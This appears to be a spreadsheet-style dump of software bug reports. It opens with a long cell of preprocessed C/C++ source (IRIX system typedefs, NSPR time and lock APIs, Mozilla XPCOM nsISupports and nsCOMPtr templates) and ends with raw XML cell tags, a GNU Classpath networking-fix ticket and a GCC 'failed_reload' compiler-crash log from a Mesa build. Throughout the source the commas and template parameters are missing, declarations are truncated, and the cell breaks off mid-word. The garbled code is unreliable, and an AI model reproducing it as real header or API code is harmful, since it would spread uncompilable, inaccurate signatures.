typedef int key_t
typedef unsigned char use_t
typedef long sysid_t
typedef short index_t
typedef signed short nasid_t
typedef signed short cnodeid_t
typedef signed char partid_t
typedef signed short moduleid_t
typedef signed short cmoduleid_t
typedef uchar_t clusterid_t
typedef unsigned int lock_t
typedef signed short cpuid_t
typedef unsigned char pri_t
typedef __uint64_t accum_t
typedef __int64_t prid_t
typedef __int64_t ash_t
typedef short cell_t
typedef int credid_t
typedef __int64_t jid_t
typedef int ssize_t
typedef long time_t
typedef long clock_t
typedef int clockid_t
typedef int timer_t
typedef unsigned int useconds_t
typedef __scunsigned_t bitnum_t
typedef __scunsigned_t bitlen_t
typedef int processorid_t
typedef int toid_t
typedef long *qaddr_t
typedef __uint32_t inst_t
typedef __uint64_t machreg_t
typedef __uint64_t fpreg_t
typedef signed char int8_t
typedef unsigned char uint8_t
typedef signed short int16_t
typedef unsigned short uint16_t
typedef signed int int32_t
typedef unsigned int uint32_t
typedef __int64_t int64_t
typedef __uint64_t uint64_t
typedef __int64_t intmax_t
typedef __uint64_t uintmax_t
typedef signed long int intptr_t
typedef unsigned long int uintptr_t
typedef unsigned char u_int8_t
typedef unsigned short u_int16_t
typedef __uint32_t u_int32_t
typedef long hostid_t
#ident $Revision: 1.2 $
typedef struct { int r[1] } * physadr
typedef unsigned char unchar
typedef unsigned char u_char
typedef unsigned short ushort
typedef unsigned short u_short
typedef unsigned int uint
typedef unsigned int u_int
typedef unsigned long ulong
typedef unsigned long u_long
typedef struct _quad { long val[2] } quad
#ident $Revision: 1.17 $
extern C {
typedef long fd_mask_t
typedef unsigned long ufd_mask_t
typedef struct fd_set {
        fd_mask_t fds_bits[(((1024)+(((int)(sizeof(fd_mask_t) * 8))-1))/((int)(sizeof(fd_mask_t) * 8)))]
} fd_set
extern C {
#ident $Revision: 1.41 $
extern void *memcpy(void * const void * size_t)
extern void *memmove(void * const void * size_t)
extern char *strcpy(char * const char *)
extern char *strncpy(char * const char * size_t)
extern char *strcat(char * const char *)
extern char *strncat(char * const char * size_t)
extern void *memccpy(void * const void * int size_t)
extern int memcmp(const void * const void * size_t)
extern int strcmp(const char * const char *)
extern int strcoll(const char * const char *)
extern int strncmp(const char * const char * size_t)
extern size_t strxfrm(char * const char * size_t)
extern void *memchr(const void * int size_t)
extern char *strchr(const char * int)
extern size_t strcspn(const char * const char *)
#pragma int_to_unsigned strcspn
extern char *strpbrk(const char * const char *)
extern char *strrchr(const char * int)
extern size_t strspn(const char * const char *)
#pragma int_to_unsigned strspn
extern char *strstr(const char * const char *)
extern char *strtok(char * const char *)
extern void *memset(void * int size_t)
extern char *strerror(int)
extern size_t strlen(const char *)
#pragma int_to_unsigned strlen
extern int ffs(int)
extern int strcasecmp(const char * const char *)
extern int strncasecmp(const char * const char * size_t)
extern char *strdup(const char *)
extern char *strtok_r(char * const char * char **)
}
typedef long fd_mask
}
typedef __uint64_t k_sigset_t
typedef PRUint64 uint64
typedef PRUint32 uint32
typedef PRUint16 uint16
typedef PRUint8 uint8
typedef PRInt64 int64
typedef PRInt32 int32
typedef PRInt16 int16
typedef PRInt8 int8
typedef PRFloat64 float64
typedef PRUptrdiff uptrdiff_t
typedef PRUword uprword_t
typedef PRWord prword_t
}
typedef PRUint32 nsresult
    typedef PRUint16 PRUnichar
extern nsresult
NS_ErrorAccordingToNSPR()
class nsDebug {
public:
  static void AbortIfFalse(const char* aStr const char* aExpr
                                  const char* aFile PRIntn aLine)
  static PRBool WarnIfFalse(const char* aStr const char* aExpr
                                   const char* aFile PRIntn aLine)
  static void SetWarningMessageBoxEnable(PRBool aOnOff)
  static PRBool GetWarningMessageBoxEnable(void)
  static void Abort(const char* aFile PRIntn aLine)
  static void Break(const char* aFile PRIntn aLine)
  static void PreCondition(const char* aStr const char* aExpr
                                  const char* aFile PRIntn aLine)
  static void PostCondition(const char* aStr const char* aExpr
                                   const char* aFile PRIntn aLine)
  static void Assertion(const char* aStr const char* aExpr
                               const char* aFile PRIntn aLine)
  static void NotYetImplemented(const char* aMessage
                                       const char* aFile PRIntn aLine)
  static void NotReached(const char* aMessage
                                const char* aFile PRIntn aLine)
  static void Error(const char* aMessage
                           const char* aFile PRIntn aLine)
  static void Warning(const char* aMessage
                             const char* aFile PRIntn aLine)
}
extern C {
extern PRInt64 LL_MaxInt(void)
extern PRInt64 LL_MinInt(void)
extern PRInt64 LL_Zero(void)
}
extern C {
typedef PRInt64 PRTime
typedef struct PRTimeParameters {
    PRInt32 tp_gmt_offset
    PRInt32 tp_dst_offset
} PRTimeParameters
typedef struct PRExplodedTime {
    PRInt32 tm_usec
    PRInt32 tm_sec
    PRInt32 tm_min
    PRInt32 tm_hour
    PRInt32 tm_mday
    PRInt32 tm_month
    PRInt16 tm_year
    PRInt8 tm_wday
    PRInt16 tm_yday
    PRTimeParameters tm_params
} PRExplodedTime
typedef PRTimeParameters ( *PRTimeParamFn)(const PRExplodedTime *gmt)
extern PRTime
PR_Now(void)
extern void PR_ExplodeTime(
    PRTime usecs PRTimeParamFn params PRExplodedTime *exploded)
extern PRTime
PR_ImplodeTime(const PRExplodedTime *exploded)
extern void PR_NormalizeTime(
    PRExplodedTime *exploded PRTimeParamFn params)
extern PRTimeParameters PR_LocalTimeParameters(const PRExplodedTime *gmt)
extern PRTimeParameters PR_GMTParameters(const PRExplodedTime *gmt)
extern PRTimeParameters PR_USPacificTimeParameters(const PRExplodedTime *gmt)
extern PRStatus PR_ParseTimeString (
        const char *string
        PRBool default_to_gmt
        PRTime *result)
extern PRUint32 PR_FormatTime(char *buf int buflen const char *fmt
                                           const PRExplodedTime *tm)
extern PRUint32
PR_FormatTimeUSEnglish( char* buf PRUint32 bufSize
                        const char* format const PRExplodedTime* tm )
}
struct nsID {
  PRUint32 m0
  PRUint16 m1
  PRUint16 m2
  PRUint8 m3[8]
  inline PRBool Equals(const nsID&amp; other) const {
    return (PRBool)
      ((((PRUint32*) &amp;m0)[0] == ((PRUint32*) &amp;other.m0)[0]) &amp;&amp;
       (((PRUint32*) &amp;m0)[1] == ((PRUint32*) &amp;other.m0)[1]) &amp;&amp;
       (((PRUint32*) &amp;m0)[2] == ((PRUint32*) &amp;other.m0)[2]) &amp;&amp;
       (((PRUint32*) 
  }
         PRBool Parse(const char *aIDStr)
         char* ToString() const
}
typedef nsID nsCID
typedef nsID nsIID
typedef PRUint32 nsrefcnt
class nsISupports {
public:
  virtual nsresult QueryInterface(const nsIID
  virtual nsrefcnt AddRef(void) = 0
  virtual nsrefcnt Release(void) = 0
}
extern C {
typedef struct PRLock PRLock
extern PRLock* PR_NewLock(void)
extern void PR_DestroyLock(PRLock *lock)
extern void PR_Lock(PRLock *lock)
extern PRStatus PR_Unlock(PRLock *lock)
}
extern C {
extern PRInt32 PR_AtomicIncrement(PRInt32 *val)
extern PRInt32 PR_AtomicDecrement(PRInt32 *val)
extern PRInt32 PR_AtomicSet(PRInt32 *val PRInt32 newval)
extern PRInt32 PR_AtomicAdd(PRInt32 *ptr PRInt32 val)
typedef struct PRStackElemStr PRStackElem
struct PRStackElemStr {
    PRStackElem *prstk_elem_next
}
typedef struct PRStackStr PRStack
extern PRStack * PR_CreateStack(const char *stack_name)
extern void PR_StackPush(PRStack *stack PRStackElem *stack_elem)
extern PRStackElem * PR_StackPop(PRStack *stack)
extern PRStatus PR_DestroyStack(PRStack *stack)
}
typedef __builtin_va_list __gnuc_va_list
extern C {
#ident $Revision: 1.75 $
typedef __int64_t fpos_t
typedef __int64_t fpos64_t
typedef char *__not_va_list__
typedef struct
__file_s
{
        int _cnt
        unsigned char *_ptr
        unsigned char *_base
        unsigned char _flag
        unsigned char _o_file
        unsigned short _file
} FILE
extern FILE __iob[100]
extern FILE *_lastbuf
extern unsigned char *_bufendtab[]
extern unsigned char _sibuf[] _sobuf[]
extern int remove(const char *)
extern int rename(const char * const char *)
extern FILE *tmpfile(void)
extern char *tmpnam(char *)
extern int fclose(FILE *)
extern int fflush(FILE *)
extern FILE *fopen(const char * const char *)
extern FILE *freopen(const char * const char * FILE *)
extern void setbuf(FILE * char *)
extern int setvbuf(FILE * char * int size_t)
extern int fprintf(FILE * const char * ...)
extern int fscanf(FILE * const char * ...)
extern int printf(const char * ...)
extern int scanf(const char * ...)
extern int snprintf(char * ssize_t const char * ...)
extern int sprintf(char * const char * ...)
extern int sscanf(const char * const char * ...)
extern int vfprintf(FILE * const char * __gnuc_va_list)
extern int vprintf(const char * __gnuc_va_list)
extern int vsnprintf(char * ssize_t const char * __gnuc_va_list)
extern int vsprintf(char * const char * __gnuc_va_list)
extern int fgetc(FILE *)
extern char *fgets(char * int FILE *)
extern int fputc(int FILE *)
extern int fputs(const char * FILE *)
extern int getc(FILE *)
extern int getchar(void)
extern char *gets(char *)
extern int putc(int FILE *)
extern int putchar(int)
extern int puts(const char *)
extern int ungetc(int FILE *)
extern size_t fread(void * size_t size_t FILE *)
#pragma int_to_unsigned fread
extern size_t fwrite(const void * size_t size_t FILE *)
#pragma int_to_unsigned fwrite
extern int fgetpos(FILE * fpos_t *)
extern int fseek(FILE * long int)
extern int fsetpos(FILE * const fpos_t *)
extern long ftell(FILE *)
extern void rewind(FILE *)
extern void clearerr(FILE *)
extern int feof(FILE *)
extern int ferror(FILE *)
extern void perror(const char *)
extern int __filbuf(FILE *)
extern int __flsbuf(int FILE *)
extern FILE *fdopen(int const char *)
extern int fileno(FILE *)
extern void flockfile(FILE *)
extern int ftrylockfile(FILE *)
extern void funlockfile(FILE *)
extern int getc_unlocked(FILE *)
extern int putc_unlocked(int FILE *)
extern int getchar_unlocked(void)
extern int putchar_unlocked(int)
extern FILE *popen(const char * const char *)
extern int pclose(FILE *)
#ident $Revision: 1.11 $
extern C {
extern int getopt(int char *const * const char *)
extern char *optarg
extern int opterr
extern int optind
extern int optopt
extern int getsubopt(char ** char *const * char **)
extern void getoptreset(void)
}
extern char *ctermid(char *)
extern char *cuserid(char *)
extern char *tempnam(const char * const char *)
extern int getw(FILE *)
extern int putw(int FILE *)
extern char *mktemp(char *)
extern int mkstemp(char *)
extern int setbuffer(FILE * char * int)
extern int setlinebuf(FILE *)
extern int system(const char *)
extern off_t ftello(FILE *)
extern int fseeko(FILE * off_t int)
extern int fgetpos64(FILE * fpos64_t *)
extern FILE *fopen64(const char * const char *)
extern FILE *freopen64(const char * const char * FILE *)
extern int fseek64(FILE * __int64_t int)
extern int fseeko64(FILE * off64_t int)
extern int fsetpos64(FILE * const fpos64_t *)
extern __int64_t ftell64(FILE *)
extern off64_t ftello64(FILE *)
extern FILE *tmpfile64(void)
extern int __semputc(int FILE *)
extern int __semgetc(FILE *)
extern int __us_rsthread_stdio
extern char *ctermid_r(char *)
}
class nsISupports
struct nsTraceRefcntStats {
  nsrefcnt mAddRefs
  nsrefcnt mReleases
  nsrefcnt mCreates
  nsrefcnt mDestroys
  double mRefsOutstandingTotal
  double mRefsOutstandingSquared
  double mObjsOutstandingTotal
  double mObjsOutstandingSquared
}
typedef PRBool ( *nsTraceRefcntStatFunc)
  (const char* aTypeName
   PRUint32 aInstanceSize
   nsTraceRefcntStats* aCurrentStats
   nsTraceRefcntStats* aPrevStats
   void *aClosure)
class nsTraceRefcnt {
public:
  static void Startup()
  static void Shutdown()
  static void LogAddRef(void* aPtr
                               nsrefcnt aNewRefCnt
                               const char* aTypeName
                               PRUint32 aInstanceSize)
  static void LogRelease(void* aPtr
                                nsrefcnt aNewRefCnt
                                const char* aTypeName)
  static void LogNewXPCOM(void* aPtr
                                 const char* aTypeName
                                 PRUint32 aInstanceSize
                                 const char* aFile
                                 int aLine)
  static void LogDeleteXPCOM(void* aPtr
                                    const char* aFile
                                    int aLine)
  static nsrefcnt LogAddRefCall(void* aPtr
                                       nsrefcnt aNewRefcnt
                                       const char* aFile
                                       int aLine)
  static nsrefcnt LogReleaseCall(void* aPtr
                                        nsrefcnt aNewRefcnt
                                        const char* aFile
                                        int aLine)
  static void LogCtor(void* aPtr const char* aTypeName
                             PRUint32 aInstanceSize)
  static void LogDtor(void* aPtr const char* aTypeName
                             PRUint32 aInstanceSize)
  static void LogAddCOMPtr(void *aCOMPtr nsISupports *aObject)
  static void LogReleaseCOMPtr(void *aCOMPtr nsISupports *aObject)
  enum StatisticsType {
    ALL_STATS
    NEW_STATS
  }
  static nsresult DumpStatistics(StatisticsType type = ALL_STATS
                                        FILE* out = 0)
  static void ResetStatistics(void)
  static void GatherStatistics(nsTraceRefcntStatFunc aFunc
                                      void* aClosure)
  static void LoadLibrarySymbols(const char* aLibraryName
                                        void* aLibrayHandle)
  static void DemangleSymbol(const char * aSymbol
                                    char * aBuffer
                                    int aBufLen)
  static void WalkTheStack(FILE* aStream)
  static void SetPrefServiceAvailability(PRBool avail)
  static void SetActivityIsLegal(PRBool aLegal)
}
extern C void
NS_MeanAndStdDev(double n double sumOfValues double sumOfSquaredValues
                 double *meanResult double *stdDevResult)
extern C void* NS_CurrentThread(void)
extern C void NS_CheckThreadSafe(void* owningThread
                                             const char* msg)
class nsIProgrammingLanguage : public nsISupports {
 public:
  static const nsIID return iid}
  enum { UNKNOWN = 0U }
  enum { CPLUSPLUS = 1U }
  enum { JAVASCRIPT = 2U }
  enum { PYTHON = 3U }
  enum { PERL = 4U }
  enum { JAVA = 5U }
  enum { ZX81_BASIC = 6U }
  enum { JAVASCRIPT2 = 7U }
}
class nsIClassInfo : public nsISupports {
 public:
  static const nsIID return iid}
  virtual nsresult GetInterfaces(PRUint32 *count nsIID * **array) = 0
  virtual nsresult GetHelperForLanguage(PRUint32 language nsISupports **_retval) = 0
  virtual nsresult GetContractID(char * *aContractID) = 0
  virtual nsresult GetClassDescription(char * *aClassDescription) = 0
  virtual nsresult GetClassID(nsCID * *aClassID) = 0
  virtual nsresult GetImplementationLanguage(PRUint32 *aImplementationLanguage) = 0
  enum { SINGLETON = 1U }
  enum { THREADSAFE = 2U }
  enum { MAIN_THREAD_ONLY = 4U }
  enum { DOM_OBJECT = 8U }
  enum { PLUGIN_OBJECT = 16U }
  enum { EAGER_CLASSINFO = 32U }
  enum { RESERVED = 2147483648U }
  virtual nsresult GetFlags(PRUint32 *aFlags) = 0
  virtual nsresult GetClassIDNoAlloc(nsCID *aClassIDNoAlloc) = 0
}
extern C {
typedef PRUint32 PRIntervalTime
extern PRIntervalTime PR_IntervalNow(void)
extern PRUint32 PR_TicksPerSecond(void)
extern PRIntervalTime PR_SecondsToInterval(PRUint32 seconds)
extern PRIntervalTime PR_MillisecondsToInterval(PRUint32 milli)
extern PRIntervalTime PR_MicrosecondsToInterval(PRUint32 micro)
extern PRUint32 PR_IntervalToSeconds(PRIntervalTime ticks)
extern PRUint32 PR_IntervalToMilliseconds(PRIntervalTime ticks)
extern PRUint32 PR_IntervalToMicroseconds(PRIntervalTime ticks)
}
extern C {
typedef struct PRMonitor PRMonitor
extern PRMonitor* PR_NewMonitor(void)
extern void PR_DestroyMonitor(PRMonitor *mon)
extern void PR_EnterMonitor(PRMonitor *mon)
extern PRStatus PR_ExitMonitor(PRMonitor *mon)
extern PRStatus PR_Wait(PRMonitor *mon PRIntervalTime ticks)
extern PRStatus PR_Notify(PRMonitor *mon)
extern PRStatus PR_NotifyAll(PRMonitor *mon)
}
extern C {
extern PRMonitor* PR_CEnterMonitor(void *address)
extern PRStatus PR_CExitMonitor(void *address)
extern PRStatus PR_CWait(void *address PRIntervalTime timeout)
extern PRStatus PR_CNotify(void *address)
extern PRStatus PR_CNotifyAll(void *address)
extern void PR_CSetOnMonitorRecycle(void ( *callback)(void *address))
}
inline
nsrefcnt
NS_DebugGetRefCount( nsISupports* obj )
  {
    nsrefcnt ref_count = 0
    if ( obj )
      {
        obj-&gt;AddRef()
        ref_count = obj-&gt;Release()
        if (!(ref_count)) nsDebug::Assertion(Oops! Calling |NS_DebugGetRefCount()| probably just  destroyed this object. ref_count ../../dist/include/xpcom/nsISupportsObsolete.h 90)
      }
     return ref_count
  }
extern C++ {
template 
inline
nsrefcnt
ns_if_addref( T expr )
  {
    return expr ? expr-&gt;AddRef() : 0
  }
}
extern C++ {
class nsISupports
template 
struct nsCOMTypeInfo
  {
    static const nsIID }
  }
template 
struct nsCOMTypeInfo
  {
    static const nsIID&amp; GetIID() {
        static const nsIID iid_NS_ISUPPORTS_IID = { 0x00000000 0x0000 0x0000 {0xc0 0x00 0x00 0x00 0x00 0x00 0x00 0x46} } return iid_NS_ISUPPORTS_IID
    }
  }
template 
inline
nsresult
CallQueryInterface( T* aSource DestinationType** aDestination )
  {
    if (!(aSource)) nsDebug::PreCondition(null parameter aSource ../../dist/include/xpcom/nsISupportsUtils.h 266)
    if (!(aDestination)) nsDebug::PreCondition(null parameter aDestination ../../dist/include/xpcom/nsISupportsUtils.h 267)
    return aSource-&gt;QueryInterface(nsCOMTypeInfo::GetIID()
                                   reinterpret_cast(aDestination))
  }
}
class nsIFactory : public nsISupports {
 public:
  static const nsIID return iid}
  virtual nsresult CreateInstance(nsISupports *aOuter const nsIID 
  virtual nsresult LockFactory(PRBool lock) = 0
}
struct nsModuleComponentInfo
class nsIGenericFactory : public nsIFactory {
public:
    static const nsIID return iid}
    virtual nsresult SetComponentInfo(nsModuleComponentInfo *info) = 0
    virtual nsresult GetComponentInfo(nsModuleComponentInfo **infop) = 0
}
extern nsresult
NS_NewGenericFactory(nsIGenericFactory **result
                     nsModuleComponentInfo *info)
class nsIFile
class nsIComponentManager
class nsIModule : public nsISupports {
 public:
  static const nsIID return iid}
  virtual nsresult GetClassObject(nsIComponentManager *aCompMgr const nsCID 
  virtual nsresult RegisterSelf(nsIComponentManager *aCompMgr nsIFile *location const char *registryLocation const char *componentType) = 0
  virtual nsresult UnregisterSelf(nsIComponentManager *aCompMgr nsIFile *location const char *registryLocation) = 0
  virtual nsresult CanUnload(nsIComponentManager *aCompMgr PRBool *_retval) = 0
}
extern C nsresult NSGetModule(nsIComponentManager *aCompMgr
                                          nsIFile* location
                                          nsIModule** return_cobj)
typedef nsresult ( *nsGetModuleProc)(nsIComponentManager *aCompMgr
                                    nsIFile* location
                                    nsIModule** return_cobj)
typedef nsresult (* NSConstructorProcPtr)(nsISupports *aOuter const nsIID&amp; aIID
                                          void **aResult)
typedef nsresult (* NSRegisterSelfProcPtr)(nsIComponentManager *aCompMgr
                                           nsIFile *aPath
                                           const char *aRegistryLocation
                                           const char *aComponentType
                                           const nsModuleComponentInfo *aInfo)
typedef nsresult (* NSUnregisterSelfProcPtr)(nsIComponentManager *aCompMgr
                                             nsIFile *aPath
                                             const char *aRegistryLocation
                                             const nsModuleComponentInfo *aInfo)
typedef nsresult (* NSFactoryDestructorProcPtr)(void)
typedef nsresult (* NSGetInterfacesProcPtr)(PRUint32 *countp
                                            nsIID* **array)
typedef nsresult (* NSGetLanguageHelperProcPtr)(PRUint32 language
                                                nsISupports **helper)
struct nsModuleComponentInfo {
    const char* mDescription
    nsCID mCID
    const char* mContractID
    NSConstructorProcPtr mConstructor
    NSRegisterSelfProcPtr mRegisterSelfProc
    NSUnregisterSelfProcPtr mUnregisterSelfProc
    NSFactoryDestructorProcPtr mFactoryDestructor
    NSGetInterfacesProcPtr mGetInterfacesProc
    NSGetLanguageHelperProcPtr mGetLanguageHelperProc
    nsIClassInfo ** mClassInfoGlobal
    PRUint32 mFlags
}
typedef nsresult ( *nsModuleConstructorProc) (nsIModule *self)
typedef void ( *nsModuleDestructorProc) (nsIModule *self)
struct nsModuleInfo {
    PRUint32 mVersion
    const char* mModuleName
    nsModuleComponentInfo* mComponents
    PRUint32 mCount
    nsModuleConstructorProc mCtor
    nsModuleDestructorProc mDtor
}
extern nsresult
NS_NewGenericModule2(nsModuleInfo *info nsIModule* *result)
extern nsresult
NS_NewGenericModule(const char* moduleName
                    PRUint32 componentCount
                    nsModuleComponentInfo* components
                    nsModuleDestructorProc dtor
                    nsIModule* *result)
class nsIFactory
class nsIComponentManager : public nsISupports {
 public:
  static const nsIID return iid}
  virtual nsresult GetClassObject(const nsCID 
  virtual nsresult GetClassObjectByContractID(const char *aContractID const nsIID 
  virtual nsresult CreateInstance(const nsCID 
  virtual nsresult CreateInstanceByContractID(const char *aContractID nsISupports *aDelegate const nsIID 
}
  typedef PRBool NSCAP_BOOL
template 
class nsDerivedSafe : public T
  {
    private:
      using T::AddRef
      using T::Release
      void operator delete( void* size_t )
      nsDerivedSafe
  }
template 
struct already_AddRefed
  {
    already_AddRefed( T* aRawPtr )
        : mRawPtr(aRawPtr)
      {
      }
    T* get() const { return mRawPtr }
    T* mRawPtr
  }
template 
inline
const already_AddRefed
getter_AddRefs( T* aRawPtr )
  {
    return already_AddRefed(aRawPtr)
  }
template 
inline
const already_AddRefed
getter_AddRefs( const already_AddRefed&amp; aAlreadyAddRefedPtr )
  {
    return aAlreadyAddRefedPtr
  }
template 
inline
const already_AddRefed
dont_AddRef( T* aRawPtr )
  {
    return already_AddRefed(aRawPtr)
  }
template 
inline
const already_AddRefed
dont_AddRef( const already_AddRefed aAlreadyAddRefedPtr )
  {
    return aAlreadyAddRefedPtr
  }
template 
inline
T*
dont_QueryInterface( T* expr )
  {
    return expr
  }
class nsCOMPtr_helper
  {
    public:
      virtual nsresult operator()( const nsIID
  }
class nsQueryInterface : public nsCOMPtr_helper
  {
    public:
      nsQueryInterface( nsISupports* aRawPtr nsresult* error )
          : mRawPtr(aRawPtr)
            mErrorPtr(error)
        {
        }
      virtual nsresult operator()( const nsIID
    private:
      nsISupports* mRawPtr
      nsresult* mErrorPtr
  }
inline
const nsQueryInterface
do_QueryInterface( nsISupports* aRawPtr nsresult* error = 0 )
  {
    return nsQueryInterface(aRawPtr error)
  }
template 
inline
void
do_QueryInterface( already_AddRefed&amp; )
  {
  }
template 
inline
void
do_QueryInterface( already_AddRefed&amp; nsresult* )
  {
  }
class nsCOMPtr_base
  {
    public:
      nsCOMPtr_base( nsISupports* rawPtr = 0 )
          : mRawPtr(rawPtr)
        {
        }
                ~nsCOMPtr_base() { }
                void assign_with_AddRef( nsISupports* )
                void assign_from_helper( const nsCOMPtr_helper
                void** begin_assignment()
    protected:
      nsISupports* mRawPtr
      void
      assign_assuming_AddRef( nsISupports* newPtr )
        {
          nsISupports* oldPtr = mRawPtr
          mRawPtr = newPtr
          if ((newPtr)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(newPtr))
          if ( oldPtr )
             if ((oldPtr)) { nsTraceRefcnt::LogReleaseCOMPtr((this)static_cast(oldPtr)) do { (oldPtr)-&gt;Release() (oldPtr) = 0 } while (0) }
        }
  }
template 
class nsCOMPtr
  {
    enum { _force_even_compliant_compilers_to_fail_ = sizeof(T) }
    private:
      void assign_with_AddRef( nsISupports* )
      void assign_from_helper( const nsCOMPtr_helper
      void** begin_assignment()
      void
      assign_assuming_AddRef( T* newPtr )
        {
          T* oldPtr = mRawPtr
          mRawPtr = newPtr
          if ((newPtr)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(newPtr))
          if ( oldPtr )
             if ((oldPtr)) { nsTraceRefcnt::LogReleaseCOMPtr((this)static_cast(oldPtr)) do { (oldPtr)-&gt;Release() (oldPtr) = 0 } while (0) }
        }
    private:
      T* mRawPtr
    public:
      typedef T element_type
     ~nsCOMPtr()
        {
          if ( mRawPtr )
             if ((mRawPtr)) { nsTraceRefcnt::LogReleaseCOMPtr((this)static_cast(mRawPtr)) do { (mRawPtr)-&gt;Release() (mRawPtr) = 0 } while (0) }
        }
      void
      Assert_NoQueryNeeded()
        {
          if ( mRawPtr )
            {
              nsCOMPtr query_result( do_QueryInterface(mRawPtr) )
              if (!(query_result.get() == mRawPtr)) nsDebug::Assertion(QueryInterface needed query_result.get() == mRawPtr ../../dist/include/xpcom/nsCOMPtr.h 501)
            }
        }
      nsCOMPtr()
            : mRawPtr(0)
        {
          if ((0)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(0))
        }
      nsCOMPtr( const nsCOMPtr&amp; aSmartPtr )
            : mRawPtr(aSmartPtr.mRawPtr)
        {
          if ( mRawPtr )
            (mRawPtr)-&gt;AddRef()
          if ((aSmartPtr.mRawPtr)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(aSmartPtr.mRawPtr))
        }
      nsCOMPtr( T* aRawPtr )
            : mRawPtr(aRawPtr)
        {
          if ( mRawPtr )
            (mRawPtr)-&gt;AddRef()
          if ((aRawPtr)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(aRawPtr))
          Assert_NoQueryNeeded()
        }
      nsCOMPtr( const already_AddRefed&amp; aSmartPtr )
            : mRawPtr(aSmartPtr.mRawPtr)
        {
          if ((aSmartPtr.mRawPtr)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(aSmartPtr.mRawPtr))
          Assert_NoQueryNeeded()
        }
      nsCOMPtr( const nsCOMPtr_helper&amp; helper )
            : mRawPtr(0)
        {
          if ((0)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(0))
          assign_from_helper(helper nsCOMTypeInfo::GetIID())
          Assert_NoQueryNeeded()
        }
      nsCOMPtr( const nsQueryInterface&amp; helper )
            : mRawPtr(0)
        {
          if ((0)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(0))
          assign_from_helper(helper nsCOMTypeInfo::GetIID())
        }
      nsCOMPtr&amp;
      operator=( const nsCOMPtr&amp; rhs )
        {
          assign_with_AddRef(rhs.mRawPtr)
          return *this
        }
      nsCOMPtr&amp;
      operator=( T* rhs )
        {
          assign_with_AddRef(rhs)
          Assert_NoQueryNeeded()
          return *this
        }
      nsCOMPtr&amp;
      operator=( const already_AddRefed&amp; rhs )
        {
          assign_assuming_AddRef(rhs.mRawPtr)
          Assert_NoQueryNeeded()
          return *this
        }
      nsCOMPtr&amp;
      operator=( const nsCOMPtr_helper&amp; rhs )
        {
          assign_from_helper(rhs nsCOMTypeInfo::GetIID())
          Assert_NoQueryNeeded()
          return *this
        }
      nsCOMPtr&amp;
      operator=( const nsQueryInterface&amp; rhs )
        {
          assign_from_helper(rhs nsCOMTypeInfo::GetIID())
          return *this
        }
      nsDerivedSafe*
      get() const
        {
          return reinterpret_cast* &gt;(mRawPtr)
        }
      operator nsDerivedSafe*() const
        {
          return get()
        }
      nsDerivedSafe*
      operator-&gt;() const
        {
          if (!(mRawPtr != 0)) nsDebug::PreCondition(You can't dereference a NULL nsCOMPtr with operator-&gt;(). mRawPtr != 0 ../../dist/include/xpcom/nsCOMPtr.h 650)
          return get()
        }
      nsCOMPtr*
      get_address()
        {
          return this
        }
      const nsCOMPtr*
      get_address() const
        {
          return this
        }
    private:
      const nsCOMPtr*
      operator&amp;() const
        {
          return this
        }
      nsCOMPtr*
      operator&amp;()
        {
          return this
        }
    public:
      nsDerivedSafe&amp;
      operator*() const
        {
          if (!(mRawPtr != 0)) nsDebug::PreCondition(You can't dereference a NULL nsCOMPtr with operator*(). mRawPtr != 0 ../../dist/include/xpcom/nsCOMPtr.h 714)
          return *get()
        }
      T**
      StartAssignment()
        {
          return reinterpret_cast(begin_assignment())
        }
  }
template 
class nsCOMPtr
    : private nsCOMPtr_base
  {
    public:
      typedef nsISupports element_type
     ~nsCOMPtr()
         {
           if ( mRawPtr )
              if ((mRawPtr)) { nsTraceRefcnt::LogReleaseCOMPtr((this)static_cast(mRawPtr)) do { (mRawPtr)-&gt;Release() (mRawPtr) = 0 } while (0) }
         }
      nsCOMPtr()
            : nsCOMPtr_base(0)
        {
          if ((0)) nsTraceRefcnt::LogAddCOMPtr((this)static_cast(0))
        }
      nsCOMPtr( const nsCOMPtr&amp; aSmar</t>
  </si>
  <si>
    <t>mathew</t>
  </si>
  <si>
    <t>CLASSPATH-22699</t>
  </si>
  <si>
    <t>Net subsystem fixes</t>
  </si>
  <si>
    <t>Various fixes for the net subsystem:
* errors thrown by InetSocketAddress are more explicit.
* prevent NullPointerException when doing a comparison (ala Sun) (InetSocketAddress)
* InetSocketAddress.toString should build a string with the internal requested hostname if that hostname cannot be solved.
* InetAddress:
      - new LOOPBACK_BITS static field to store localhost address.
      - IPV6 compatibility
      - added isAnyAddress and isLoopbackAddress
* NetworkInterface (optional but recommanded):
      - don't forget to load native library javanet
      - native call getRealNetworkInterfaces return  a Hashtable now instead of a vector.</t>
  </si>
  <si>
    <t>GCC-7367</t>
  </si>
  <si>
    <t>Internal compiler error in failed_reload at reload1.c:5050</t>
  </si>
  <si>
    <t>make[3]: Getting into `/root/Mesa-4.0.3old/src'
/bin/sh ../libtool --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I.. -I../include -I../src    -g -O2 -Wall -fomit-frame-pointer -ffast-math -fexpensive-optimizations -fstrict-aliasing -malign-loops=2 -malign-jumps=2 -malign-functions=2 -D_REENTRANT -DPTHREADS -c -o image.lo `test -f image.c || echo './'`image.c
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I../include -I../src -g -O2 -Wall -fomit-frame-pointer -ffast-math -fexpensive-optimizations -fstrict-aliasing -malign-loops=2 -malign-jumps=2 -malign-functions=2 -D_REENTRANT -DPTHREADS -c image.c  -fPIC -DPIC -o image.lo
cc1: warning: -malign-loops is obsolete use -falign-loops
cc1: warning: -malign-jumps is obsolete use -falign-jumps
cc1: warning: -malign-functions is obsolete use -falign-functions
image.c: In function `_mesa_unpack_chan_color_span':
image.c:2874: could not find a spill register
(insn 1618 1616 1619 (set (subreg:SF (reg:QI 277) 0)
        (plus:SF (reg:SF 8 st(0) [278])
            (reg:SF 9 st(1) [282]))) 525 {*fop_sf_comm_nosse} (insn_list 1609 (nil))
    (expr_list:REG_DEAD (reg:SF 8 st(0) [278])
        (nil)))
image.c:2874: Internal compiler error in failed_reload at reload1.c:5050
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [image.lo] B??d 1
